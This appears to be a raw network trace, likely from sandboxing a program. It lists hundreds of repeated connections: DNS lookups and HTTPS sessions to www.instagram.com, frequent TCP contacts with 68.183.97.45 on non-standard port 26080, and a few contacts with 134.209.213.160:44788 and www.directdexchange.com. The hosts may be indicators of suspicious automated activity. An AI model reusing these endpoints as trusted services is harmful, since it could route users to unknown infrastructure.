NL 31.13.64.174:443 www.instagram.com tcp
US 8.8.8.8:53 www.instagram.com udp
NL 31.13.64.174:443 www.instagram.com tcp
US 68.183.97.45:26080 tcp
US 8.8.8.8:53 www.instagram.com udp
NL 31.13.64.174:443 www.instagram.com tcp
US 8.8.8.8:53 www.instagram.com udp
NL 31.13.64.174:443 www.instagram.com tcp
US 68.183.97.45:26080 tcp
US 68.183.97.45:26080 tcp
US 8.8.8.8:53 www.instagram.com udp
NL 31.13.64.174:443 www.instagram.com tcp
US 8.8.8.8:53 www.instagram.com udp
NL 31.13.64.174:443 www.instagram.com tcp
US 68.183.97.45:26080 tcp
US 8.8.8.8:53 www.instagram.com udp
NL 31.13.64.174:443 www.instagram.com tcp
US 8.8.8.8:53 www.instagram.com udp
NL 31.13.64.174:443 www.instagram.com tcp
US 68.183.97.45:26080 tcp
US 8.8.8.8:53 www.instagram.com udp
NL 31.13.64.174:443 www.instagram.com tcp
US 68.183.97.45:26080 tcp
US 8.8.8.8:53 www.instagram.com udp
NL 31.13.64.174:443 www.instagram.com tcp
US 8.8.8.8:53 www.instagram.com udp
NL 31.13.64.174:443 www.instagram.com tcp
US 8.8.8.8:53 www.instagram.com udp
US 8.8.8.8:53 www.instagram.com udp
US 8.8.8.8:53 www.instagram.com udp
US 8.8.8.8:53 www.instagram.com udp
US 8.8.8.8:53 www.instagram.com udp
NL 31.13.64.174:443 www.instagram.com tcp
US 8.8.8.8:53 www.instagram.com udp
NL 31.13.64.174:443 www.instagram.com tcp
US 8.8.8.8:53 www.instagram.com udp
NL 31.13.64.174:443 www.instagram.com tcp
NL 31.13.64.174:443 www.instagram.com tcp
US 8.8.8.8:53 www.instagram.com udp
NL 31.13.64.174:443 www.instagram.com tcp
US 8.8.8.8:53 www.instagram.com udp
NL 31.13.64.174:443 www.instagram.com tcp
US 8.8.8.8:53 www.instagram.com udp
NL 31.13.64.174:443 www.instagram.com tcp
NL 31.13.64.174:443 www.instagram.com tcp
NL 31.13.64.174:443 www.instagram.com tcp
NL 31.13.64.174:443 www.instagram.com tcp
US 68.183.97.45:26080 tcp
US 8.8.8.8:53 www.instagram.com udp
NL 31.13.64.174:443 www.instagram.com tcp
US 68.183.97.45:26080 tcp
US 8.8.8.8:53 www.instagram.com udp
NL 31.13.64.174:443 www.instagram.com tcp
US 68.183.97.45:26080 tcp
US 68.183.97.45:26080 tcp
US 68.183.97.45:26080 tcp
US 8.8.8.8:53 www.instagram.com udp
US 8.8.8.8:53 www.instagram.com udp
US 8.8.8.8:53 www.instagram.com udp
NL 31.13.64.174:443 www.instagram.com tcp
NL 31.13.64.174:443 www.instagram.com tcp
NL 31.13.64.174:443 www.instagram.com tcp
US 68.183.97.45:26080 tcp
US 68.183.97.45:26080 tcp
US 68.183.97.45:26080 tcp
US 68.183.97.45:26080 tcp
US 68.183.97.45:26080 tcp
US 68.183.97.45:26080 tcp
US 68.183.97.45:26080 tcp
US 68.183.97.45:26080 tcp
US 68.183.97.45:26080 tcp
US 68.183.97.45:26080 tcp
US 8.8.8.8:53 www.instagram.com udp
NL 31.13.64.174:443 www.instagram.com tcp
US 8.8.8.8:53 www.instagram.com udp
NL 31.13.64.174:443 www.instagram.com tcp
US 8.8.8.8:53 www.instagram.com udp
NL 31.13.64.174:443 www.instagram.com tcp
NL 31.13.64.174:443 www.instagram.com tcp
US 8.8.8.8:53 www.instagram.com udp
NL 31.13.64.174:443 www.instagram.com tcp
US 8.8.8.8:53 www.instagram.com udp
NL 31.13.64.174:443 www.instagram.com tcp
US 8.8.8.8:53 www.instagram.com udp
NL 31.13.64.174:443 www.instagram.com tcp
US 8.8.8.8:53 www.instagram.com udp
NL 31.13.64.174:443 www.instagram.com tcp
US 68.183.97.45:26080 tcp
US 8.8.8.8:53 www.instagram.com udp
NL 31.13.64.174:443 www.instagram.com tcp
US 8.8.8.8:53 www.instagram.com udp
NL 31.13.64.174:443 www.instagram.com tcp
US 8.8.8.8:53 www.instagram.com udp
NL 31.13.64.174:443 www.instagram.com tcp
US 8.8.8.8:53 www.instagram.com udp
NL 31.13.64.174:443 www.instagram.com tcp
US 68.183.97.45:26080 tcp
US 8.8.8.8:53 www.instagram.com udp
NL 31.13.64.174:443 www.instagram.com tcp
US 68.183.97.45:26080 tcp
US 8.8.8.8:53 www.instagram.com udp
NL 31.13.64.174:443 www.instagram.com tcp
US 68.183.97.45:26080 tcp
US 8.8.8.8:53 www.instagram.com udp
NL 31.13.64.174:443 www.instagram.com tcp
US 68.183.97.45:26080 tcp
US 8.8.8.8:53 www.instagram.com udp
NL 31.13.64.174:443 www.instagram.com tcp
US 68.183.97.45:26080 tcp
US 8.8.8.8:53 www.instagram.com udp
NL 31.13.64.174:443 www.instagram.com tcp
US 68.183.97.45:26080 tcp
US 68.183.97.45:26080 tcp
US 68.183.97.45:26080 tcp
US 68.183.97.45:26080 tcp
US 8.8.8.8:53 www.instagram.com udp
NL 31.13.64.174:443 www.instagram.com tcp
US 68.183.97.45:26080 tcp
US 68.183.97.45:26080 tcp
US 8.8.8.8:53 www.instagram.com udp
NL 31.13.64.174:443 www.instagram.com tcp
US 68.183.97.45:26080 tcp
US 8.8.8.8:53 www.instagram.com udp
NL 31.13.64.174:443 www.instagram.com tcp
US 68.183.97.45:26080 tcp
US 8.8.8.8:53 www.instagram.com udp
NL 31.13.64.174:443 www.instagram.com tcp
US 68.183.97.45:26080 tcp
US 8.8.8.8:53 www.instagram.com udp
NL 31.13.64.174:443 www.instagram.com tcp
US 8.8.8.8:53 www.instagram.com udp
NL 31.13.64.174:443 www.instagram.com tcp
US 8.8.8.8:53 www.instagram.com udp
NL 31.13.64.174:443 www.instagram.com tcp
US 8.8.8.8:53 www.instagram.com udp
NL 31.13.64.174:443 www.instagram.com tcp
US 8.8.8.8:53 www.instagram.com udp
NL 31.13.64.174:443 www.instagram.com tcp
US 68.183.97.45:26080 tcp
US 68.183.97.45:26080 tcp
US 8.8.8.8:53 www.instagram.com udp
NL 31.13.64.174:443 www.instagram.com tcp
US 68.183.97.45:26080 tcp
US 8.8.8.8:53 www.instagram.com udp
NL 31.13.64.174:443 www.instagram.com tcp
US 68.183.97.45:26080 tcp
US 68.183.97.45:26080 tcp
US 8.8.8.8:53 www.instagram.com udp
NL 31.13.64.174:443 www.instagram.com tcp
US 8.8.8.8:53 www.instagram.com udp
NL 31.13.64.174:443 www.instagram.com tcp
US 8.8.8.8:53 www.instagram.com udp
NL 31.13.64.174:443 www.instagram.com tcp
US 68.183.97.45:26080 tcp
US 8.8.8.8:53 www.instagram.com udp
NL 31.13.64.174:443 www.instagram.com tcp
US 68.183.97.45:26080 tcp
US 8.8.8.8:53 www.instagram.com udp
NL 31.13.64.174:443 www.instagram.com tcp
US 68.183.97.45:26080 tcp
US 8.8.8.8:53 www.instagram.com udp
NL 31.13.64.174:443 www.instagram.com tcp
US 68.183.97.45:26080 tcp
US 68.183.97.45:26080 tcp
US 8.8.8.8:53 www.instagram.com udp
NL 31.13.64.174:443 www.instagram.com tcp
US 68.183.97.45:26080 tcp
NL 31.13.64.174:443 www.instagram.com tcp
US 68.183.97.45:26080 tcp
US 68.183.97.45:26080 tcp
US 68.183.97.45:26080 tcp
US 8.8.8.8:53 www.instagram.com udp
NL 31.13.64.174:443 www.instagram.com tcp
US 68.183.97.45:26080 tcp
US 68.183.97.45:26080 tcp
US 68.183.97.45:26080 tcp
US 8.8.8.8:53 www.instagram.com udp
NL 31.13.64.174:443 www.instagram.com tcp
US 8.8.8.8:53 www.instagram.com udp
NL 31.13.64.174:443 www.instagram.com tcp
US 68.183.97.45:26080 tcp
US 8.8.8.8:53 www.instagram.com udp
NL 31.13.64.174:443 www.instagram.com tcp
US 8.8.8.8:53 www.instagram.com udp
US 8.8.8.8:53 www.instagram.com udp
US 8.8.8.8:53 www.instagram.com udp
US 8.8.8.8:53 www.instagram.com udp
NL 31.13.64.174:443 www.instagram.com tcp
NL 31.13.64.174:443 www.instagram.com tcp
NL 31.13.64.174:443 www.instagram.com tcp
NL 31.13.64.174:443 www.instagram.com tcp
US 68.183.97.45:26080 tcp
US 68.183.97.45:26080 tcp
US 8.8.8.8:53 www.instagram.com udp
NL 31.13.64.174:443 www.instagram.com tcp
US 8.8.8.8:53 www.instagram.com udp
US 8.8.8.8:53 www.directdexchange.com udp
NL 31.13.64.174:443 www.instagram.com tcp
US 68.183.97.45:26080 tcp
US 8.8.8.8:53 www.instagram.com udp
NL 31.13.64.174:443 www.instagram.com tcp
US 68.183.97.45:26080 tcp
US 68.183.97.45:26080 tcp
US 68.183.97.45:26080 tcp
US 8.8.8.8:53 www.instagram.com udp
NL 31.13.64.174:443 www.instagram.com tcp
US 68.183.97.45:26080 tcp
US 8.8.8.8:53 www.instagram.com udp
NL 31.13.64.174:443 www.instagram.com tcp
US 68.183.97.45:26080 tcp
US 68.183.97.45:26080 tcp
US 68.183.97.45:26080 tcp
US 68.183.97.45:26080 tcp
US 8.8.8.8:53 www.instagram.com udp
NL 31.13.64.174:443 www.instagram.com tcp
US 8.8.8.8:53 www.instagram.com udp
NL 31.13.64.174:443 www.instagram.com tcp
US 35.201.70.46:80 www.directdexchange.com tcp
US 35.201.70.46:80 www.directdexchange.com tcp
US 8.8.8.8:53 www.instagram.com udp
NL 31.13.64.174:443 www.instagram.com tcp
US 68.183.97.45:26080 tcp
US 8.8.8.8:53 www.instagram.com udp
NL 31.13.64.174:443 www.instagram.com tcp
US 8.8.8.8:53 www.instagram.com udp
NL 31.13.64.174:443 www.instagram.com tcp
US 68.183.97.45:26080 tcp
US 68.183.97.45:26080 tcp
US 8.8.8.8:53 www.instagram.com udp
NL 31.13.64.174:443 www.instagram.com tcp
US 68.183.97.45:26080 tcp
US 68.183.97.45:26080 tcp
NL 31.13.64.174:443 www.instagram.com tcp
US 68.183.97.45:26080 tcp
US 68.183.97.45:26080 tcp
US 8.8.8.8:53 www.instagram.com udp
NL 31.13.64.174:443 www.instagram.com tcp
US 8.8.8.8:53 www.instagram.com udp
NL 31.13.64.174:443 www.instagram.com tcp
US 68.183.97.45:26080 tcp
US 8.8.8.8:53 www.instagram.com udp
NL 31.13.64.174:443 www.instagram.com tcp
US 68.183.97.45:26080 tcp
US 8.8.8.8:53 www.instagram.com udp
NL 31.13.64.174:443 www.instagram.com tcp
US 8.8.8.8:53 www.instagram.com udp
NL 31.13.64.174:443 www.instagram.com tcp
US 8.8.8.8:53 www.instagram.com udp
NL 31.13.64.174:443 www.instagram.com tcp
US 68.183.97.45:26080 tcp
US 8.8.8.8:53 www.instagram.com udp
NL 31.13.64.174:443 www.instagram.com tcp
US 68.183.97.45:26080 tcp
US 68.183.97.45:26080 tcp
US 8.8.8.8:53 www.instagram.com udp
NL 31.13.64.174:443 www.instagram.com tcp
US 8.8.8.8:53 www.instagram.com udp
NL 31.13.64.174:443 www.instagram.com tcp
US 68.183.97.45:26080 tcp
US 8.8.8.8:53 www.instagram.com udp
NL 31.13.64.174:443 www.instagram.com tcp
US 8.8.8.8:53 www.instagram.com udp
NL 31.13.64.174:443 www.instagram.com tcp
US 8.8.8.8:53 www.instagram.com udp
NL 31.13.64.174:443 www.instagram.com tcp
US 68.183.97.45:26080 tcp
US 68.183.97.45:26080 tcp
US 68.183.97.45:26080 tcp
US 68.183.97.45:26080 tcp
US 68.183.97.45:26080 tcp
US 68.183.97.45:26080 tcp
US 68.183.97.45:26080 tcp
US 68.183.97.45:26080 tcp
US 68.183.97.45:26080 tcp
US 68.183.97.45:26080 tcp
US 68.183.97.45:26080 tcp
US 68.183.97.45:26080 tcp
US 68.183.97.45:26080 tcp
US 68.183.97.45:26080 tcp
US 68.183.97.45:26080 tcp
US 8.8.8.8:53 www.instagram.com udp
US 8.8.8.8:53 www.instagram.com udp
US 8.8.8.8:53 www.instagram.com udp
US 8.8.8.8:53 www.instagram.com udp
US 8.8.8.8:53 www.instagram.com udp
US 8.8.8.8:53 www.instagram.com udp
US 8.8.8.8:53 www.instagram.com udp
US 8.8.8.8:53 www.instagram.com udp
US 8.8.8.8:53 www.instagram.com udp
NL 31.13.64.174:443 www.instagram.com tcp
NL 31.13.64.174:443 www.instagram.com tcp
US 8.8.8.8:53 www.instagram.com udp
NL 31.13.64.174:443 www.instagram.com tcp
NL 31.13.64.174:443 www.instagram.com tcp
NL 31.13.64.174:443 www.instagram.com tcp
NL 31.13.64.174:443 www.instagram.com tcp
NL 31.13.64.174:443 www.instagram.com tcp
NL 31.13.64.174:443 www.instagram.com tcp
NL 31.13.64.174:443 www.instagram.com tcp
NL 31.13.64.174:443 www.instagram.com tcp
NL 31.13.64.174:443 www.instagram.com tcp
NL 31.13.64.174:443 www.instagram.com tcp
US 8.8.8.8:53 www.instagram.com udp
NL 31.13.64.174:443 www.instagram.com tcp
US 8.8.8.8:53 www.instagram.com udp
NL 31.13.64.174:443 www.instagram.com tcp
US 8.8.8.8:53 www.instagram.com udp
NL 31.13.64.174:443 www.instagram.com tcp
US 68.183.97.45:26080 tcp
US 8.8.8.8:53 www.instagram.com udp
NL 31.13.64.174:443 www.instagram.com tcp
US 68.183.97.45:26080 tcp
US 68.183.97.45:26080 tcp
US 68.183.97.45:26080 tcp
US 68.183.97.45:26080 tcp
US 68.183.97.45:26080 tcp
US 8.8.8.8:53 www.instagram.com udp
NL 31.13.64.174:443 www.instagram.com tcp
US 68.183.97.45:26080 tcp
US 68.183.97.45:26080 tcp
US 68.183.97.45:26080 tcp
US 68.183.97.45:26080 tcp
US 68.183.97.45:26080 tcp
US 8.8.8.8:53 www.instagram.com udp
NL 31.13.64.174:443 www.instagram.com tcp
US 8.8.8.8:53 www.instagram.com udp
NL 31.13.64.174:443 www.instagram.com tcp
US 68.183.97.45:26080 tcp
US 8.8.8.8:53 www.instagram.com udp
NL 31.13.64.174:443 www.instagram.com tcp
US 8.8.8.8:53 www.instagram.com udp
NL 31.13.64.174:443 www.instagram.com tcp
US 8.8.8.8:53 www.instagram.com udp
NL 31.13.64.174:443 www.instagram.com tcp
US 68.183.97.45:26080 tcp
US 8.8.8.8:53 www.instagram.com udp
NL 31.13.64.174:443 www.instagram.com tcp
US 8.8.8.8:53 www.instagram.com udp
NL 31.13.64.174:443 www.instagram.com tcp
NL 31.13.64.174:443 www.instagram.com tcp
US 68.183.97.45:26080 tcp
US 8.8.8.8:53 www.instagram.com udp
NL 31.13.64.174:443 www.instagram.com tcp
US 8.8.8.8:53 www.instagram.com udp
NL 31.13.64.174:443 www.instagram.com tcp
US 68.183.97.45:26080 tcp
US 8.8.8.8:53 www.instagram.com udp
NL 31.13.64.174:443 www.instagram.com tcp
US 68.183.97.45:26080 tcp
US 68.183.97.45:26080 tcp
US 68.183.97.45:26080 tcp
US 68.183.97.45:26080 tcp
US 8.8.8.8:53 www.instagram.com udp
NL 31.13.64.174:443 www.instagram.com tcp
NL 31.13.64.174:443 www.instagram.com tcp
US 8.8.8.8:53 www.instagram.com udp
NL 31.13.64.174:443 www.instagram.com tcp
US 68.183.97.45:26080 tcp
US 8.8.8.8:53 www.instagram.com udp
NL 31.13.64.174:443 www.instagram.com tcp
US 68.183.97.45:26080 tcp
NL 31.13.64.174:443 www.instagram.com tcp
US 8.8.8.8:53 www.instagram.com udp
US 68.183.97.45:26080 tcp
US 8.8.8.8:53 www.instagram.com udp
NL 31.13.64.174:443 www.instagram.com tcp
US 8.8.8.8:53 www.instagram.com udp
NL 31.13.64.174:443 www.instagram.com tcp
US 68.183.97.45:26080 tcp
US 8.8.8.8:53 www.instagram.com udp
NL 31.13.64.174:443 www.instagram.com tcp
US 68.183.97.45:26080 tcp
US 8.8.8.8:53 www.instagram.com udp
NL 31.13.64.174:443 www.instagram.com tcp
US 8.8.8.8:53 www.instagram.com udp
NL 31.13.64.174:443 www.instagram.com tcp
US 68.183.97.45:26080 tcp
US 8.8.8.8:53 www.instagram.com udp
NL 31.13.64.174:443 www.instagram.com tcp
US 68.183.97.45:26080 tcp
US 8.8.8.8:53 www.instagram.com udp
NL 31.13.64.174:443 www.instagram.com tcp
US 68.183.97.45:26080 tcp
US 8.8.8.8:53 www.instagram.com udp
NL 31.13.64.174:443 www.instagram.com tcp
US 68.183.97.45:26080 tcp
US 68.183.97.45:26080 tcp
US 8.8.8.8:53 www.instagram.com udp
NL 31.13.64.174:443 www.instagram.com tcp
US 8.8.8.8:53 www.instagram.com udp
NL 31.13.64.174:443 www.instagram.com tcp
US 68.183.97.45:26080 tcp
US 68.183.97.45:26080 tcp
US 68.183.97.45:26080 tcp
US 8.8.8.8:53 www.instagram.com udp
NL 31.13.64.174:443 www.instagram.com tcp
US 8.8.8.8:53 www.instagram.com udp
US 8.8.8.8:53 www.instagram.com udp
GB 157.240.240.174:443 www.instagram.com tcp
NL 31.13.64.174:443 www.instagram.com tcp
US 68.183.97.45:26080 tcp
US 8.8.8.8:53 www.instagram.com udp
NL 31.13.64.174:443 www.instagram.com tcp
US 68.183.97.45:26080 tcp
US 8.8.8.8:53 www.instagram.com udp
NL 31.13.64.174:443 www.instagram.com tcp
US 68.183.97.45:26080 tcp
US 68.183.97.45:26080 tcp
US 68.183.97.45:26080 tcp
US 8.8.8.8:53 www.instagram.com udp
NL 31.13.64.174:443 www.instagram.com tcp
US 68.183.97.45:26080 tcp
US 8.8.8.8:53 www.instagram.com udp
NL 31.13.64.174:443 www.instagram.com tcp
NL 31.13.64.174:443 www.instagram.com tcp
US 8.8.8.8:53 www.instagram.com udp
NL 31.13.64.174:443 www.instagram.com tcp
US 8.8.8.8:53 www.instagram.com udp
NL 31.13.64.174:443 www.instagram.com tcp
US 68.183.97.45:26080 tcp
US 68.183.97.45:26080 tcp
US 8.8.8.8:53 www.instagram.com udp
NL 31.13.64.174:443 www.instagram.com tcp
US 68.183.97.45:26080 tcp
US 8.8.8.8:53 www.instagram.com udp
NL 31.13.64.174:443 www.instagram.com tcp
US 68.183.97.45:26080 tcp
US 8.8.8.8:53 www.instagram.com udp
NL 31.13.64.174:443 www.instagram.com tcp
US 68.183.97.45:26080 tcp
US 8.8.8.8:53 www.instagram.com udp
NL 31.13.64.174:443 www.instagram.com tcp
US 68.183.97.45:26080 tcp
US 8.8.8.8:53 www.instagram.com udp
NL 31.13.64.174:443 www.instagram.com tcp
US 68.183.97.45:26080 tcp
US 8.8.8.8:53 www.instagram.com udp
NL 31.13.64.174:443 www.instagram.com tcp
US 8.8.8.8:53 www.instagram.com udp
NL 31.13.64.174:443 www.instagram.com tcp
US 68.183.97.45:26080 tcp
US 8.8.8.8:53 www.instagram.com udp
NL 31.13.64.174:443 www.instagram.com tcp
US 68.183.97.45:26080 tcp
NL 31.13.64.174:443 www.instagram.com tcp
US 68.183.97.45:26080 tcp
US 8.8.8.8:53 www.instagram.com udp
NL 31.13.64.174:443 www.instagram.com tcp
US 68.183.97.45:26080 tcp
US 8.8.8.8:53 www.instagram.com udp
NL 31.13.64.174:443 www.instagram.com tcp
US 68.183.97.45:26080 tcp
US 68.183.97.45:26080 tcp
US 68.183.97.45:26080 tcp
US 68.183.97.45:26080 tcp
US 8.8.8.8:53 www.instagram.com udp
US 8.8.8.8:53 www.instagram.com udp
US 8.8.8.8:53 www.instagram.com udp
US 8.8.8.8:53 www.instagram.com udp
NL 31.13.64.174:443 www.instagram.com tcp
NL 31.13.64.174:443 www.instagram.com tcp
NL 31.13.64.174:443 www.instagram.com tcp
NL 31.13.64.174:443 www.instagram.com tcp
US 68.183.97.45:26080 tcp
US 8.8.8.8:53 www.instagram.com udp
NL 31.13.64.174:443 www.instagram.com tcp
US 68.183.97.45:26080 tcp
US 8.8.8.8:53 www.instagram.com udp
NL 31.13.64.174:443 www.instagram.com tcp
US 68.183.97.45:26080 tcp
US 68.183.97.45:26080 tcp
US 68.183.97.45:26080 tcp
US 8.8.8.8:53 www.instagram.com udp
NL 31.13.64.174:443 www.instagram.com tcp
US 68.183.97.45:26080 tcp
US 68.183.97.45:26080 tcp
US 8.8.8.8:53 www.instagram.com udp
GB 157.240.240.174:443 www.instagram.com tcp
US 8.8.8.8:53 www.instagram.com udp
NL 31.13.64.174:443 www.instagram.com tcp
US 68.183.97.45:26080 tcp
US 68.183.97.45:26080 tcp
US 8.8.8.8:53 www.instagram.com udp
NL 31.13.64.174:443 www.instagram.com tcp
US 68.183.97.45:26080 tcp
US 8.8.8.8:53 www.instagram.com udp
NL 31.13.64.174:443 www.instagram.com tcp
US 68.183.97.45:26080 tcp
US 8.8.8.8:53 www.instagram.com udp
NL 31.13.64.174:443 www.instagram.com tcp
US 68.183.97.45:26080 tcp
US 8.8.8.8:53 www.instagram.com udp
NL 31.13.64.174:443 www.instagram.com tcp
US 8.8.8.8:53 www.instagram.com udp
NL 31.13.64.174:443 www.instagram.com tcp
US 8.8.8.8:53 www.instagram.com udp
US 8.8.8.8:53 www.instagram.com udp
NL 31.13.64.174:443 www.instagram.com tcp
US 68.183.97.45:26080 tcp
US 8.8.8.8:53 www.instagram.com udp
NL 31.13.64.174:443 www.instagram.com tcp
US 68.183.97.45:26080 tcp
NL 31.13.64.174:443 www.instagram.com tcp
US 68.183.97.45:26080 tcp
US 8.8.8.8:53 www.instagram.com udp
US 68.183.97.45:26080 tcp
US 8.8.8.8:53 www.instagram.com udp
NL 31.13.64.174:443 www.instagram.com tcp
US 68.183.97.45:26080 tcp
US 8.8.8.8:53 www.instagram.com udp
NL 31.13.64.174:443 www.instagram.com tcp
US 68.183.97.45:26080 tcp
US 68.183.97.45:26080 tcp
US 68.183.97.45:26080 tcp
US 8.8.8.8:53 www.instagram.com udp
NL 31.13.64.174:443 www.instagram.com tcp
US 68.183.97.45:26080 tcp
US 8.8.8.8:53 www.instagram.com udp
NL 31.13.64.174:443 www.instagram.com tcp
US 68.183.97.45:26080 tcp
US 8.8.8.8:53 www.instagram.com udp
NL 31.13.64.174:443 www.instagram.com tcp
US 8.8.8.8:53 www.instagram.com udp
NL 31.13.64.174:443 www.instagram.com tcp
US 68.183.97.45:26080 tcp
US 8.8.8.8:53 www.instagram.com udp
NL 31.13.64.174:443 www.instagram.com tcp
US 68.183.97.45:26080 tcp
US 8.8.8.8:53 www.instagram.com udp
NL 31.13.64.174:443 www.instagram.com tcp
NL 31.13.64.174:443 www.instagram.com tcp
US 8.8.8.8:53 www.instagram.com udp
NL 31.13.64.174:443 www.instagram.com tcp
US 68.183.97.45:26080 tcp
US 8.8.8.8:53 www.instagram.com udp
NL 31.13.64.174:443 www.instagram.com tcp
US 68.183.97.45:26080 tcp
US 8.8.8.8:53 www.instagram.com udp
GB 157.240.240.174:443 www.instagram.com tcp
US 68.183.97.45:26080 tcp
US 68.183.97.45:26080 tcp
US 134.209.213.160:44788 tcp
US 8.8.8.8:53 www.instagram.com udp
NL 31.13.64.174:443 www.instagram.com tcp
US 8.8.8.8:53 www.instagram.com udp
NL 31.13.64.174:443 www.instagram.com tcp
US 68.183.97.45:26080 tcp
NL 31.13.64.174:443 www.instagram.com tcp
US 8.8.8.8:53 www.instagram.com udp
NL 31.13.64.174:443 www.instagram.com tcp
US 68.183.97.45:26080 tcp
US 8.8.8.8:53 www.instagram.com udp
NL 31.13.64.174:443 www.instagram.com tcp
US 68.183.97.45:26080 tcp
US 68.183.97.45:26080 tcp
US 68.183.97.45:26080 tcp
US 68.183.97.45:26080 tcp
US 68.183.97.45:26080 tcp
US 68.183.97.45:26080 tcp
US 68.183.97.45:26080 tcp
US 68.183.97.45:26080 tcp
US 68.183.97.45:26080 tcp
US 68.183.97.45:26080 tcp
US 68.183.97.45:26080 tcp
US 68.183.97.45:26080 tcp
US 68.183.97.45:26080 tcp
US 68.183.97.45:26080 tcp
US 68.183.97.45:26080 tcp
US 68.183.97.45:26080 tcp
US 68.183.97.45:26080 tcp
US 68.183.97.45:26080 tcp
US 68.183.97.45:26080 tcp
US 8.8.8.8:53 www.instagram.com udp
NL 31.13.64.174:443 www.instagram.com tcp
US 8.8.8.8:53 www.instagram.com udp
NL 31.13.64.174:443 www.instagram.com tcp
US 8.8.8.8:53 www.instagram.com udp
NL 31.13.64.174:443 www.instagram.com tcp
US 8.8.8.8:53 www.instagram.com udp
NL 31.13.64.174:443 www.instagram.com tcp
US 8.8.8.8:53 www.instagram.com udp
NL 31.13.64.174:443 www.instagram.com tcp
US 8.8.8.8:53 www.instagram.com udp
NL 31.13.64.174:443 www.instagram.com tcp
US 68.183.97.45:26080 tcp
US 8.8.8.8:53 www.instagram.com udp
NL 31.13.64.174:443 www.instagram.com tcp
US 8.8.8.8:53 www.instagram.com udp
NL 31.13.64.174:443 www.instagram.com tcp
US 8.8.8.8:53 www.instagram.com udp
NL 31.13.64.174:443 www.instagram.com tcp
US 8.8.8.8:53 www.instagram.com udp
NL 31.13.64.174:443 www.instagram.com tcp
US 8.8.8.8:53 www.instagram.com udp
NL 31.13.64.174:443 www.instagram.com tcp
US 8.8.8.8:53 www.instagram.com udp
NL 31.13.64.174:443 www.instagram.com tcp
US 68.183.97.45:26080 tcp
US 8.8.8.8:53 www.instagram.com udp
NL 31.13.64.174:443 www.instagram.com tcp
US 68.183.97.45:26080 tcp
US 68.183.97.45:26080 tcp
US 68.183.97.45:26080 tcp
US 8.8.8.8:53 www.instagram.com udp
NL 31.13.64.174:443 www.instagram.com tcp
US 8.8.8.8:53 www.instagram.com udp
NL 31.13.64.174:443 www.instagram.com tcp
US 68.183.97.45:26080 tcp
US 68.183.97.45:26080 tcp
US 8.8.8.8:53 www.instagram.com udp
NL 31.13.64.174:443 www.instagram.com tcp
US 8.8.8.8:53 www.instagram.com udp
NL 31.13.64.174:443 www.instagram.com tcp
US 68.183.97.45:26080 tcp
US 8.8.8.8:53 www.instagram.com udp
NL 31.13.64.174:443 www.instagram.com tcp
US 8.8.8.8:53 www.instagram.com udp
NL 31.13.64.174:443 www.instagram.com tcp
US 8.8.8.8:53 www.instagram.com udp
NL 31.13.64.174:443 www.instagram.com tcp
US 68.183.97.45:26080 tcp
NL 31.13.64.174:443 www.instagram.com tcp
US 8.8.8.8:53 www.instagram.com udp
NL 31.13.64.174:443 www.instagram.com tcp
US 8.8.8.8:53 www.instagram.com udp
NL 31.13.64.174:443 www.instagram.com tcp
US 8.8.8.8:53 www.instagram.com udp
NL 31.13.64.174:443 www.instagram.com tcp
US 68.183.97.45:26080 tcp
US 8.8.8.8:53 www.instagram.com udp
NL 31.13.64.174:443 www.instagram.com tcp
US 8.8.8.8:53 www.instagram.com udp
NL 31.13.64.174:443 www.instagram.com tcp
US 8.8.8.8:53 www.instagram.com udp
NL 31.13.64.174:443 www.instagram.com tcp
US 68.183.97.45:26080 tcp
US 68.183.97.45:26080 tcp
US 8.8.8.8:53 www.instagram.com udp
NL 31.13.64.174:443 www.instagram.com tcp
US 8.8.8.8:53 www.instagram.com udp
GB 157.240.240.174:443 www.instagram.com tcp
US 8.8.8.8:53 www.instagram.com udp
NL 31.13.64.174:443 www.instagram.com tcp
US 8.8.8.8:53 www.instagram.com udp
GB 157.240.240.174:443 www.instagram.com tcp
US 68.183.97.45:26080 tcp
US 68.183.97.45:26080 tcp
US 8.8.8.8:53 www.instagram.com udp
NL 31.13.64.174:443 www.instagram.com tcp
US 8.8.8.8:53 www.instagram.com udp
NL 31.13.64.174:443 www.instagram.com tcp
US 68.183.97.45:26080 tcp
US 68.183.97.45:26080 tcp
US 8.8.8.8:53 www.instagram.com udp
NL 31.13.64.174:443 www.instagram.com tcp
US 8.8.8.8:53 www.instagram.com udp
NL 31.13.64.174:443 www.instagram.com tcp
US 68.183.97.45:26080 tcp
US 68.183.97.45:26080 tcp
US 68.183.97.45:26080 tcp
US 68.183.97.45:26080 tcp
US 68.183.97.45:26080 tcp
US 68.183.97.45:26080 tcp
US 8.8.8.8:53 www.instagram.com udp
NL 31.13.64.174:443 www.instagram.com tcp
US 8.8.8.8:53 www.instagram.com udp
NL 31.13.64.174:443 www.instagram.com tcp
US 68.183.97.45:26080 tcp
US 8.8.8.8:53 www.instagram.com udp
NL 31.13.64.174:443 www.instagram.com tcp
US 8.8.8.8:53 www.instagram.com udp
NL 31.13.64.174:443 www.instagram.com tcp
US 8.8.8.8:53 www.instagram.com udp
NL 31.13.64.174:443 www.instagram.com tcp
US 8.8.8.8:53 www.instagram.com udp
NL 31.13.64.174:443 www.instagram.com tcp
US 8.8.8.8:53 www.instagram.com udp
NL 31.13.64.174:443 www.instagram.com tcp
US 68.183.97.45:26080 tcp
US 8.8.8.8:53 www.instagram.com udp
NL 31.13.64.174:443 www.instagram.com tcp
US 68.183.97.45:26080 tcp
US 68.183.97.45:26080 tcp
US 8.8.8.8:53 www.instagram.com udp
NL 31.13.64.174:443 www.instagram.com tcp
US 68.183.97.45:26080 tcp
US 8.8.8.8:53 www.instagram.com udp
NL 31.13.64.174:443 www.instagram.com tcp
US 8.8.8.8:53 www.instagram.com udp
NL 31.13.64.174:443 www.instagram.com tcp
US 68.183.97.45:26080 tcp
US 8.8.8.8:53 www.instagram.com udp
NL 31.13.64.174:443 www.instagram.com tcp
US 68.183.97.45:26080 tcp
US 68.183.97.45:26080 tcp
US 8.8.8.8:53 www.instagram.com udp
NL 31.13.64.174:443 www.instagram.com tcp
US 8.8.8.8:53 www.instagram.com udp
NL 31.13.64.174:443 www.instagram.com tcp
US 68.183.97.45:26080 tcp
US 68.183.97.45:26080 tcp
US 8.8.8.8:53 www.instagram.com udp
NL 31.13.64.174:443 www.instagram.com tcp
US 8.8.8.8:53 www.instagram.com udp
NL 31.13.64.174:443 www.instagram.com tcp
US 68.183.97.45:26080 tcp
US 8.8.8.8:53 www.instagram.com udp
NL 31.13.64.174:443 www.instagram.com tcp
US 68.183.97.45:26080 tcp
US 8.8.8.8:53 www.instagram.com udp
NL 31.13.64.174:443 www.instagram.com tcp
